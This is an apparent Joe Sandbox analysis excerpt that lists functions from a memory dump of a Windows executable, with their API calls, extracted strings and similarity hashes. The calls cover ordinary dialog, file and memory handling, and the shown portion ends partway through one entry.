                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6d6c3630af026bc64e73a6223a28ad4f3883afecc7172390ed57d0fdf78d5919
                                                                                          • Instruction ID: 5eee0bf4ec75cd7d90f3eecfef004310fdf31598427bb6342a43775b8506fd39
                                                                                          • Opcode Fuzzy Hash: 6d6c3630af026bc64e73a6223a28ad4f3883afecc7172390ed57d0fdf78d5919
                                                                                          • Instruction Fuzzy Hash: 47512371A083068BC748CF19D48059AF7E1FBC8314F058A2EE899E7744DB34EA59CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                          • Instruction ID: f0df8f576b88fed0cb2757a94f2bd6d852184bfc87f6bf8891005ce7c6f98b5c
                                                                                          • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                          • Instruction Fuzzy Hash: 513105B160474A8FCB18EF28C85126EBBE0FB95710F00892DE4DAD7341C779E909CB52
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0ee0da09eb05b2c5d72f09def0539f148b5fecda8de6616bd2e114259a1d219
                                                                                          • Instruction ID: d5a1f29f3e6d24959af7b07510ea96cc59df5a3baf00afb10cf592b39b1675c2
                                                                                          • Opcode Fuzzy Hash: f0ee0da09eb05b2c5d72f09def0539f148b5fecda8de6616bd2e114259a1d219
                                                                                          • Instruction Fuzzy Hash: 9321DA32A201655FDB08CF2DECA44367351F787311786C12FEA46CB6D5C635E925CBA0
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 008995D1
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 00899189
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 0089919B
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 008991AD
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 008991BF
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 008991D1
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 008991E3
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 008991F5
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 00899207
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 00899219
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 0089922B
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 0089923D
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 0089924F
                                                                                            • Part of subcall function 0089916C: _free.LIBCMT ref: 00899261
                                                                                          • _free.LIBCMT ref: 008995C6
                                                                                            • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                                                            • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                                                                          • _free.LIBCMT ref: 008995E8
                                                                                          • _free.LIBCMT ref: 008995FD
                                                                                          • _free.LIBCMT ref: 00899608
                                                                                          • _free.LIBCMT ref: 0089962A
                                                                                          • _free.LIBCMT ref: 0089963D
                                                                                          • _free.LIBCMT ref: 0089964B
                                                                                          • _free.LIBCMT ref: 00899656
                                                                                          • _free.LIBCMT ref: 0089968E
                                                                                          • _free.LIBCMT ref: 00899695
                                                                                          • _free.LIBCMT ref: 008996B2
                                                                                          • _free.LIBCMT ref: 008996CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: 52ef9a6a941dacaa6ffa0c9a9a3ee992f34a1b3026001c28e40208e5d5db2acb
                                                                                          • Instruction ID: 9b8bd0d2f0f14ef3227c44121e4cb5e15550288d4424805cb48f87aec98147e3
                                                                                          • Opcode Fuzzy Hash: 52ef9a6a941dacaa6ffa0c9a9a3ee992f34a1b3026001c28e40208e5d5db2acb
                                                                                          • Instruction Fuzzy Hash: 51310671604701EFEF22BA7DE845B5A77E9FB11320F18846DE4D9D6151DE35AC80CB12
                                                                                          APIs
                                                                                          • GetWindow.USER32(?,00000005), ref: 0088B8DD
                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 0088B90C
                                                                                            • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0088B92A
                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088B941
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0088B954
                                                                                            • Part of subcall function 00888B22: GetDC.USER32(00000000), ref: 00888B2E
                                                                                            • Part of subcall function 00888B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00888B3D
                                                                                            • Part of subcall function 00888B22: ReleaseDC.USER32(00000000,00000000), ref: 00888B4B
                                                                                            • Part of subcall function 00888ADF: GetDC.USER32(00000000), ref: 00888AEB
                                                                                            • Part of subcall function 00888ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00888AFA
                                                                                            • Part of subcall function 00888ADF: ReleaseDC.USER32(00000000,00000000), ref: 00888B08
                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088B97B
                                                                                          • DeleteObject.GDI32(00000000), ref: 0088B982
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 0088B98B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                          • String ID: STATIC
                                                                                          • API String ID: 1444658586-1882779555
                                                                                          • Opcode ID: 519b05cfea3c7ce7828638292437d5fb08cd8d4118e6ee2bff5228a3597e7d98
                                                                                          • Instruction ID: de04e75d3c7caa7d2e492b8fb9bffbd3afca8b9f8c45512c95cd82ad8e8f4a6f
                                                                                          • Opcode Fuzzy Hash: 519b05cfea3c7ce7828638292437d5fb08cd8d4118e6ee2bff5228a3597e7d98
                                                                                          • Instruction Fuzzy Hash: 0721D1726402247BEB217B68DC4AFAE7A6CFF45710F004011FA01E6991EB649D0287B6
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0089623F
                                                                                            • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                                                            • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                                                                          • _free.LIBCMT ref: 0089624B
                                                                                          • _free.LIBCMT ref: 00896256
                                                                                          • _free.LIBCMT ref: 00896261
                                                                                          • _free.LIBCMT ref: 0089626C
                                                                                          • _free.LIBCMT ref: 00896277
                                                                                          • _free.LIBCMT ref: 00896282
                                                                                          • _free.LIBCMT ref: 0089628D
                                                                                          • _free.LIBCMT ref: 00896298
                                                                                          • _free.LIBCMT ref: 008962A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 84727e752cf5e540588c5a313db423133813aaf5acd19e36fe36a7c9eaf59412
                                                                                          • Instruction ID: 329ecddd819d9ce540fb81caaa021b7c01341a9d4810c6eff37435b6f84a513a
                                                                                          • Opcode Fuzzy Hash: 84727e752cf5e540588c5a313db423133813aaf5acd19e36fe36a7c9eaf59412
                                                                                          • Instruction Fuzzy Hash: 39117775610608EFDF02FF98DC52DD93F65FF04360B5545A5BA888F122DA31DE509B41
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ;%u$x%u$xc%u
                                                                                          • API String ID: 0-2277559157
                                                                                          • Opcode ID: 5c289556f9198bd0bb02cccfb5fbe69ea105cd1c3314096adce083c4856b5e23
                                                                                          • Instruction ID: 6e116eab2edd07890d37ac980325265105f266eb1dbaafde2f1648c4f9b47164
                                                                                          • Opcode Fuzzy Hash: 5c289556f9198bd0bb02cccfb5fbe69ea105cd1c3314096adce083c4856b5e23
                                                                                          • Instruction Fuzzy Hash: D4F126716042805BDB19EE688895BEA7799FF94300F08C46DF88EDB29FDB24D944C763
                                                                                          APIs
                                                                                            • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                            • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          • EndDialog.USER32(?,00000001), ref: 008899AF
                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 008899DC
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008899F1
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00889A02
                                                                                          • GetDlgItem.USER32(?,00000065), ref: 00889A0B
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00889A1F
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00889A31
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                          • String ID: LICENSEDLG
                                                                                          • API String ID: 3214253823-2177901306
                                                                                          • Opcode ID: 2516246b9d5ba63490d16e9631375448323eb80a85e5f612b3457aeba26535b1
                                                                                          • Instruction ID: 9def3b2e1ff674105a9c1d73c6ce7f2d799e4a11546fa97362f0728b93458bf7
                                                                                          • Opcode Fuzzy Hash: 2516246b9d5ba63490d16e9631375448323eb80a85e5f612b3457aeba26535b1
                                                                                          • Instruction Fuzzy Hash: 4421D632240114BBE615BB69ED49E7B3FADFB47B94F054018F640E2891CB66AC01D772
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00879232
                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00879255
                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00879274
                                                                                            • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                                                                          • _swprintf.LIBCMT ref: 00879310
                                                                                            • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00879385
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 008793C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                          • String ID: rtmp%d
                                                                                          • API String ID: 2111052971-3303766350
                                                                                          • Opcode ID: 90f918a60a64044f447ffb8163633d0239f3f1a008aa14deb036caf624dba89a
                                                                                          • Instruction ID: 230773f68e562cd95df5b9009eb75f1cb2956cf55e8040682457011df3950d81
                                                                                          • Opcode Fuzzy Hash: 90f918a60a64044f447ffb8163633d0239f3f1a008aa14deb036caf624dba89a
                                                                                          • Instruction Fuzzy Hash: AE416871911258A6DF20FBA88D85EEE777DFF05380F0080A5E58DE315AEA34CB458F62
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00888705,?), ref: 00887FBA
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00887FDB
                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00888002
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                          • API String ID: 4094277203-4209811716
                                                                                          • Opcode ID: 45c33956df3f1f8a46c435b2be93e05e93b25f0a04d22ba33320497fc4ea3237
                                                                                          • Instruction ID: aa2b38ed8ad681459f227be79e9535fa95dd40bb604099ec560fbb1bbfe229ca
                                                                                          • Opcode Fuzzy Hash: 45c33956df3f1f8a46c435b2be93e05e93b25f0a04d22ba33320497fc4ea3237
                                                                                          • Instruction Fuzzy Hash: 5A31F5721083157AEB25BB289C06FABB7A8FF52320F24410AF510D61C2EF74D909C7A6
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00887DAF
                                                                                          • GetTickCount.KERNEL32 ref: 00887DCD
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00887DE3
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00887DF7
                                                                                          • TranslateMessage.USER32(?), ref: 00887E02
                                                                                          • DispatchMessageW.USER32(?), ref: 00887E0D
                                                                                          • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00887EBD
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00887EC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 4150546248-0
                                                                                          • Opcode ID: 60f37ce176876f781ccd85f0cc216b45f9a1fc75b41a600903ada7d9adde1a60
                                                                                          • Instruction ID: 4bcef69e9489e95c86fbed517f7d29b6eb7da58094f66e83c035a09cf2552b2d
                                                                                          • Opcode Fuzzy Hash: 60f37ce176876f781ccd85f0cc216b45f9a1fc75b41a600903ada7d9adde1a60
                                                                                          • Instruction Fuzzy Hash: F6415971208306AFD714EF65C88892BBBF9FF89B05B10086DB646C7611DB71EC45CB62
                                                                                          APIs
                                                                                          • __aulldiv.LIBCMT ref: 0087FE33
                                                                                            • Part of subcall function 0087A8E0: GetVersionExW.KERNEL32(?), ref: 0087A905
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0087FE5C
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0087FE6E
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0087FE7B
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0087FE91
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0087FE9D
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0087FED3
                                                                                          • __aullrem.LIBCMT ref: 0087FF5D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                          • String ID:
                                                                                          • API String ID: 1247370737-0
                                                                                          • Opcode ID: df5882e55db8b49c7ee84c80dccb44061b27680a52221260f4b02841edd2c713
                                                                                          • Instruction ID: c5728cc8ea80000e6109ebb245e32929aacf9d05adad6b5e30077fdba084a3d3
                                                                                          • Opcode Fuzzy Hash: df5882e55db8b49c7ee84c80dccb44061b27680a52221260f4b02841edd2c713
                                                                                          • Instruction Fuzzy Hash: A44128B24083059FC310DF65C8809ABB7F8FF88714F008A2EF69AD2651EB35E548DB52
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089CCE2,00000000,00000000,00000000,00000000,00000000,00892C4E), ref: 0089C5AF
                                                                                          • __fassign.LIBCMT ref: 0089C62A
                                                                                          • __fassign.LIBCMT ref: 0089C645
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089C66B
                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,0089CCE2,00000000,?,?,?,?,?,?,?,?,?,0089CCE2,00000000), ref: 0089C68A
                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,0089CCE2,00000000,?,?,?,?,?,?,?,?,?,0089CCE2,00000000), ref: 0089C6C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: 3cb5cfea0b353e741ffb006acc8e620777f36e73ba093633c6277a43786776f2
                                                                                          • Instruction ID: 8d0dbc9b501a8c47f834ee85e4511321c17aff3cfe24b479c58f05ff39490328
                                                                                          • Opcode Fuzzy Hash: 3cb5cfea0b353e741ffb006acc8e620777f36e73ba093633c6277a43786776f2
                                                                                          • Instruction Fuzzy Hash: 9251B3B1A00209AFDF14DFA8D885AEEBBF4FF19300F18415AE556E7251E7319940CF65
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 0088B0EF
                                                                                          • _swprintf.LIBCMT ref: 0088B123
                                                                                            • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                                                                          • SetDlgItemTextW.USER32(?,00000066,008B3122), ref: 0088B143
                                                                                          • _wcschr.LIBVCRUNTIME ref: 0088B176
                                                                                          • EndDialog.USER32(?,00000001), ref: 0088B257
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                          • String ID: %s%s%u
                                                                                          • API String ID: 2892007947-1360425832
                                                                                          • Opcode ID: 1878960ea2eb97722cec61ebb1d741ed2a4e694c610435a3429d7c38669a801c
                                                                                          • Instruction ID: 0f07d559673fdf8c3b60c1fde665d3f83cca56ec68b64f07e0ff7e80e2fd1c6b
